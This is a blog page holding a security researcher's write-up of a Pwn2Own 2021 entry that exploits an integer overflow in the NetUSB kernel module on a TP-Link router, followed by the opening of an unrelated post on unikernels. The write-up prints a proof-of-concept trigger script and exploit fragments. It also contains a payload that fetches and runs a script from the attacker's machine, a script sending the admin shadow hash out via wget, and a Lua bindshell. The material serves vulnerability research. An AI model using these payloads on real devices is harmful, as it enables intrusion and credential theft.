Normal view

There are new articles available, click to refresh the page.
Before yesterdayDiary of a reverse-engineer

Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate to the contest and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, the hardware was easy and cheap to get so it felt like the right choice.

router targets

At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out what are the interesting attack surfaces to look at.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two line of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low hanging fruits and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended to order a FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

Enumerating the attack surfaces

It was time for me to figure out which areas I should try to focus my time on. I did a bunch of reading as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new grounds to lower the chance of entering the competition with a duplicate and also maximize my chances at finding something that would allow me to enter the competition. Before thinking about duplicates, I need a bug.

I started to do some very basic attack surface enumeration: processes running, iptable rules, sockets listening, crontable, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq

At first sight, the following processes looked interesting: - the uhttpd HTTP server, - the third-party dnsmasq service that potentially could be unpatched to upstream bugs (unlikely?), - the tdpServer which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.

One another thing I burned time on is to go through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out if dnsmasq was properly patched to recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed different 😔. Dead-end.

NetUSB shenanigans

There were two strange lines in the netstat output from above that did stand out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -

Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where the attacker inputs is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
  if(result) {
    v64[0] = _bswapw(v64[0]); <----------------------- attacker controlled
    Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0); <---- overflow
    if(Payload_1) {
      // ...
      if(SoftwareBus_fillBuf(SbusConnection, Payload_1 + 2, v64[0]))

I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefuly, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
  if(SbusConnection)
    if(Buffer) {
      if(BufferLen) {
        while (1) {
          GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
          if ( GetLen <= 0 )
            break;
          BufferLen -= GetLen;
          Buffer = (char *)Buffer + GetLen;
          if ( !BufferLen )
            return 1;
        }
        kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
        return 0;
      }
      else {
        return 1;
      }
    } else {
      // ...
      return 0;
    }
  }
  else {
    // ...
    return 0;
  }
}

KTCP_get is basically a wrapper around ks_recv, which basically means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data I wanted. If you are interested to learn on how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py or you can also read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
  # Version
  s.send(b'\x56\x04')
  # Send random data
  s.send(aes_ctx.encrypt(b'a' * 16))
  _ = s.recv(16)
  # Receive & send back the random numbers.
  challenge = s.recv(16)
  s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
  length = len(name)
  assert length - 1 < 63
  s.send(le32(length))
  b = name
  if type(name) == str:
    b = bytes(name, 'ascii')
  s.send(b)

def create_connection(target, port, name):
  second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target, port))
  aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
  send_handshake(s, aes_ctx)
  send_bus_name(s, name)
  return s, aes_ctx

def main():
  parser = argparse.ArgumentParser('Zenith PoC2')
  parser.add_argument('--target', required = True)
  args = parser.parse_args()
  s, _ = create_connection(args.target, netusb_port, 'PoC2')
  s.send(le8(0xff))
  s.send(le8(0x21))
  s.send(le32(0xff_ff_ff_ff))
  p = b'\xab' * (0x1_000 * 100)
  s.send(p)

Another interesting detail was that the allocation function is mallocPageBuf which I didn't know about. After looking into its implementation, it eventually calls into _get_free_pages which is part of the Linux kernel. _get_free_pages allocates 2**n number of pages, and is implemented using what is called, a Binary Buddy Allocator. I wasn't familiar with that kind of allocator, and ended-up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content and I was able to overflow the pages with pretty much as much data as I wanted. The only thing that I couldn't fully control was the size passed to the allocation. The only limitation was that I could only trigger a mallocPageBuf call with a size in the following interval: [0, 8] because of the integer overflow. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke _get_free_pages.

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
  // ...
  v1 = vsprintf(v6, a1);
  v2 = v1 < 257;
  v3 = v1 + 1;
  if(!v2) {
    v6[256] = 0;
    v3 = 257;
  }
  v5 = v3;
  kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
  return printk("<1>%s", v6);
}

Pretty funny right?

Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob so this lack of introspections wasn't going to work. What are my options?

Well, as I mentioned earlier TP-Link is maintaining a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement with my current situation. I would be able to hook-up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering but it was in fact not it. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both of the kernel configurations until I end up with a bootable image that has a configuration as close as possible from the kernel running on the device. Same kernel version, allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any types used by this structure can do the same which means that looking at the main definition of a structure is not enough.

struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
  /* List of functions to handle Wireless Extensions (instead of ioctl).
   * See <net/iw_handler.h> for details. Jean II */
  const struct iw_handler_def * wireless_handlers;
  /* Instance data managed by the core of Wireless Extensions. */
  struct iw_public_data * wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
  struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
  struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
  struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
  struct netdev_rx_queue  *_rx;

  /* Number of RX queues allocated at register_netdev() time */
  unsigned int    num_rx_queues;

  /* Number of RX queues currently active in device */
  unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
  /* CPU reverse-mapping for RX completion interrupts, indexed
   * by RX queue number.  Assigned by driver.  This must only be
   * set if the ndo_rx_flow_steer operation is defined. */
  struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
//...
};

Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and try to look at the code / structures involved and see if a kernel configuration option would impact the layout of a relevant structure. From there, I could see the difference between the kernel configuration for my bootable QEMU image and the kernel I had built from the GPL and see where were mismatches. If there was one, I could simply turn the option on or off, recompile and hope that it doesn't make the kernel unbootable under QEMU.

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

over@panther:~/pwn2own$ qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337
[...]
root@debian-mips:~# ./start.sh
[   89.092000] new slab @ 86964000
[   89.108000] kcg 333 :GPL NetUSB up!
[   89.240000] NetUSB: module license 'Proprietary' taints kernel.
[   89.240000] Disabling lock debugging due to kernel taint
[   89.268000] kc   90 : run_telnetDBGDServer start
[   89.272000] kc  227 : init_DebugD end
[   89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00
[   89.272000] INFO17FA: 7437: Archer C7    :Archer C7
[   89.272000] INFO17FB:  AUTH ISOC
[   89.272000] INFO17FC:  filterAudio
[   89.272000] usbcore: registered new interface driver KC NetUSB General Driver
[   89.276000] INFO0145:  init proc : PAGE_SIZE 4096
[   89.280000] INFO16EC:  infomap 869c6e38
[   89.280000] INFO16EF:  sleep to wait eth0 to wake up
[   89.280000] INFO15BF: tcpConnector() started... : eth0
NetUSB 160207 0 - Live 0x869c0000 (P)
GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000
root@debian-mips:~# [   92.308000] INFO1572: Bind to eth0

For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones): - I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM and chroot in those folders and SHOULD be able to reproduce what I described. Or at least, be very close from reproducing. - I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz. - You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.

Enters Zenith

Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The linux kernel version was old enough that it didn't have a bunch of more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets Andrey Konovalov describes in details an attack that looked like could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher order to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000 which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could be now used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  switch (OpcodeMasked) {
    case 0x50:
        if (SoftwareBus_fillBuf(SbusConnection, ReceiveBuffer, 4)) {
          ReceivedSize = _bswapw(*(uint32_t*)ReceiveBuffer);
            AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
            if (!AllocatedBuffer) {
                return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
            }
  // ...
            if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))

Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error I started to notice that if I was taking a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close from my buffer. To this day, I haven't fully debugged where it exactly came from but as this was my only lead I went along with it.

The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute the heap directly which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d
addr_payload = 0x83c00000 + 0x10

# ...

def main(stdscr):
  # ...
  # Let's get to business.
  _3mb = 3 * 1_024 * 1_024
  payload_sprayer = SprayerThread(args.target, 'payload sprayer')
  payload_sprayer.set_length(_3mb)
  payload_sprayer.set_spray_content(payload)
  payload_sprayer.start()
  leaker.wait_for_one()
  sprayers.append(payload_sprayer)
  log(f'Payload placed @ {hex(addr_payload)}')
  y += 1

My final exploit, Zenith, overflows an adjacent wait_queue_head_t.head.next structure that is placed by the socket stack of the Linux kernel with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). This is the definition of the structure:

struct wait_queue_head {
  spinlock_t    lock;
  struct list_head  head;
};

struct wait_queue_entry {
  unsigned int    flags;
  void      *private;
  wait_queue_func_t func;
  struct list_head  entry;
};

This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
      int nr_exclusive, int wake_flags, void *key)
{
  wait_queue_t *curr, *next;

  list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
    unsigned flags = curr->flags;

    if (curr->func(curr, mode, wake_flags, key) &&
        (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
      break;
  }
}

This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00

(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff

(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)

Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
3375    kernel/sched/core.c: No such file or directory.

(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,
    prev = 0xbaadc0d1}}

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
    nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
    dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34

Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
      .word arg1
      .word arg2
envp: .word 0

The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);
  end;c:close();f:close();'

The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class).

OK at that point, it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability wise, it worked well enough on the QEMU environment: about 3 times about 5 I would say. Good enough.

I started to port over the exploit to the real device and to my surprise it also worked there as well. The reliability was poorer but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable but hey I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:

Beautiful. Time to register!

Entering the contest

As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI stuff would throw our exploits on the environment they had set-up.

At that point we had two exploits and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link pushed an update for the router 😳. I thought Damn. I was at work when I saw the news and was stressed about the bug getting killed. Or worried that the update could have changed anything that my exploit was relying on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading but it didn't have any hints suggesting that they had updated either NetUSB or the kernel which was.. good. I extracted the file off the firmware file with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and ... it was the same. Wow. What a relief 😮‍💨.

When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own.

On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.

Wrapping up

Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it:

  • Attacking the kernel might be cool, but it is an absolute pain to debug / set-up an environment. I probably would not go that route again if I was doing it again.
  • Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive.
  • Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time.
  • The Ghidra disassembler decompiles MIPS32 code pretty well. It wasn't perfect but a net positive.
  • I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money but maybe it would be good for me to do a better job at taking a look at more than a target instead of directly diving deep into one exclusively.
  • The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
  • Higher payouts don't necessarily mean a harder target.

You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references:

I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.

Oh, and come hangout on Diary of reverse-engineering's Discord server with us!

happy unikernels

By: yrp
22 December 2016 at 02:59

Intro

Below is a collection of notes regarding unikernels. I had originally prepared this stuff to submit to EkoParty’s CFP, but ended up not wanting to devote time to stabilizing PHP7’s heap structures and I lost interest in the rest of the project before it was complete. However, there are still some cool takeaways I figured I could write down. Maybe they’ll come in handy? If so, please let let me know.

Unikernels are a continuation of turning everything into a container or VM. Basically, as many VMs currently just run one userland application, the idea is that we can simplify our entire software stack by removing the userland/kernelland barrier and essentially compiling our usermode process into the kernel. This is, in the implementation I looked at, done with a NetBSD kernel and a variety of either native or lightly-patched POSIX applications (bonus: there is significant lag time between upstream fixes and rump package fixes, just like every other containerized solution).

While I don’t necessarily think that conceptually unikernels are a good idea (attack surface reduction vs mitigation removal), I do think people will start more widely deploying them shortly and I was curious what memory corruption exploitation would look like inside of them, and more generally what your payload options are like.

All of the following is based off of two unikernel programs, nginx and php5 and only makes use of public vulnerabilities. I am happy to provide all referenced code (in varying states of incompleteness), on request.

Basic ‘Hello World’ Example

To get a basic understanding of a unikernel, we’ll walk through a simple ‘Hello World’ example. First, you’ll need to clone and build (./build-rr.sh) the rumprun toolchain. This will set you up with the various utilities you'll need.

Compiling and ‘Baking’

In a rumpkernel application, we have a standard POSIX environment, minus anything involving multiple processes. Standard memory, file system, and networking calls all work as expected. The only differences lie in the multi-process related calls such as fork(), signal(), pthread_create(), etc. The scope of these differences can be found in the The Design and Implementation of the Anykernel and Rump Kernels [pdf].

From a super basic, standard ‘hello world’ program:

#include <stdio.h>
void main(void)
{
    printf("Hello\n");
}

